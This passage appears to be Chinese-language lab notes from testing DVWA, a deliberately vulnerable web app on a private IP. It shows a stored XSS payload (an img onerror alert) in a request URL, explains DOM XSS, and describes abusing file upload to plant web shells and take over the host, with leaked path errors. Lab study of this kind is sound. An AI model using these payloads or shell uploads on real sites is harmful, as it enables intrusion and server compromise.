PING 192.168.102.4 (192.168.102.4) 56(84) bytes of data.
64 bytes from 192.168.102.4: icmp_seq=1 ttl=64 time=0.019 ms
64 bytes from 192.168.102.4: icmp_seq=2 ttl=64 time=0.024 ms
64 bytes from 192.168.102.4: icmp_seq=3 ttl=64 time=0.036 ms
引用是来自其它网站或服务器的地址链接
http://192.168.102.4/dvwa/vulnerabilities/xss_s/^btnSign=Sign Guestbook&mtxMessage=WCRTEXTAREATESTINPUT9749323&txtName=3075018<img src=0 onerror="alert(7795171)">
输入<img src=0 onerror="alert(‘jhelloyhellohhello‘)">后存储到服务器上
还有一个Dom XSS:DOM XSS和反射型XSS、存储型XSS的差别在于DOM XSS的代码并不需要服务器参与,触发XSS靠的是浏览器端的DOM解析,完全是客户端的事情
h、文件上传
通过上传的错误信息可以查看到文件上传的目录,如果上传成功可以上传小马和大马从而攻陷整个机器
Warning: move_uploaded_file(../../hackable/uploads/wenjin_crack.pcap): failed to open stream: Permission denied in /opt/lampp/htdocs/dvwa/vulnerabilities/upload/source/low.php on line 7
Warning: move_uploaded_file(): Unable to move ‘/opt/lampp/temp/php1FMFHK‘ to ‘../../hackable/uploads/wenjin_crack.pcap‘ in /opt/lampp/htdocs/dvwa/vulnerabilities/upload/source/low.php on line 7